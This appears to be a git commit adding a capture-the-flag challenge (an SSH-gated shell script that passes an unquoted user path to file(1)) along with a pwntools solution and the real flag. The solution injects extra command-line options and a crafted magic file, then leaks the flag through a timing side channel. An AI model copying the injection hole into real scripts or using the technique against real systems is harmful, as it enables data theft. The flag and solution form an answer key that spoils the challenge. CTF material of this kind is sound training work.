commit d443cc3152fc206e4393e9809f282722200308ca
Author: Louis Burda <quent.burda@gmail.com>
Date: Fri, 10 May 2024 20:02:22 +0200
Add solution
Diffstat:
7 files changed, 101 insertions(+), 0 deletions(-)
diff --git a/chall/Dockerfile b/chall/Dockerfile
@@ -0,0 +1,25 @@
+FROM ubuntu:jammy
+
+RUN apt-get update && apt-get -y install openssh-server file procps
+
+WORKDIR /app
+
+RUN groupadd -r ctf && useradd -m -r -g ctf ctf
+RUN echo "ctf:ctf" | chpasswd
+
+RUN echo 'ForceCommand "/app/checker.sh"' >> /etc/ssh/sshd_config
+RUN echo 'Port 2022' >> /etc/ssh/sshd_config
+RUN mkdir /var/run/sshd
+
+COPY flag.txt /
+COPY checker.sh /app/
+
+RUN chmod 444 /flag.txt
+RUN chmod 555 /app/checker.sh
+
+CMD while true; do \
+ # kill long running processes for ssh
+ ps -eo comm,pid,etimes | awk '/^checker.sh/ {if ($3 > 10) { print $2 }}' | xargs --no-run-if-empty kill -9; \
+ sleep 5s; \
+ done & \
+ /sbin/sshd -D
diff --git a/chall/checker.sh b/chall/checker.sh
@@ -0,0 +1,9 @@
+#!/bin/bash
+
+read -p "Input a file path: " filepath
+file $filepath 2>/dev/null | grep -q "ASCII text" 2>/dev/null
+
+# TODO: print the result the above command.
+# $? == 0 -> It's a text file.
+# $? != 0 -> It's not a text file.
+exit 0
diff --git a/chall/docker-compose.yml b/chall/docker-compose.yml
@@ -0,0 +1,8 @@
+version: "3"
+
+services:
+ challenge:
+ build: .
+ restart: always
+ ports:
+ - 2022:2022
diff --git a/chall/flag.txt b/chall/flag.txt
@@ -0,0 +1 @@
+SECCON{dummy}
diff --git a/solve/flag b/solve/flag
@@ -0,0 +1 @@
+SECCON{reDo5L1fe}
diff --git a/solve/requirements.txt b/solve/requirements.txt
@@ -0,0 +1 @@
+pwntools==4.9.0
diff --git a/solve/solve.py b/solve/solve.py
@@ -0,0 +1,56 @@
+from pwn import *
+import time
+
+cmd = f"sshpass -p ctf ssh -oStrictHostKeyChecking=no " \
+ + f"-oCheckHostIP=no ctf@localhost -p 2022"
+
+magic_file = """
+
+#------------------------------------------------------------------------------
+# $File: warc,v 1.4 2019/04/19 00:42:27 christos Exp $
+# warc: file(1) magic for WARC files
+
+0 string {} SECCON FLAG
+!:mime application/warc
+
+"""
+
+n = 0
+avg = 5
+def getchar(prefix=""):
+ global n, avg
+
+ alph = string.ascii_lowercase + string.digits + "_"
+ alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[]^_`{|}~'
+ for c in alph:
+ attempt = prefix + c
+ print(f">>> {attempt}")
+ io = process(cmd.split(), stdin=PTY, raw=False)
+ io.readuntil(b"Input a file path: ")
+ io.sendline(b"-n -s -P bytes=99999999999 -m /dev/stdin /flag.txt /dev/full /dev/full /dev/full /dev/full /dev/full /dev/full /dev/full /dev/full")
+ io.sendline(magic_file.format(attempt).encode())
+ io.send(b"\4")
+ start = time.time()
+ print(io.readall())
+ end = time.time()
+ dur = end - start
+
+ print("DUR", dur)
+ print("AVG", avg)
+ if end - start >= avg + 5:
+ return c
+ n += 1
+ avg = ((n - 1) * avg + dur) / n
+ io.close()
+ return None
+
+flag = "SECCON{"
+while True:
+ try:
+ while c := getchar(prefix=flag):
+ flag += c
+ print(flag)
+ except Exception as e:
+ raise e
+ print("Exception, sleeping..")
+ time.sleep(30)
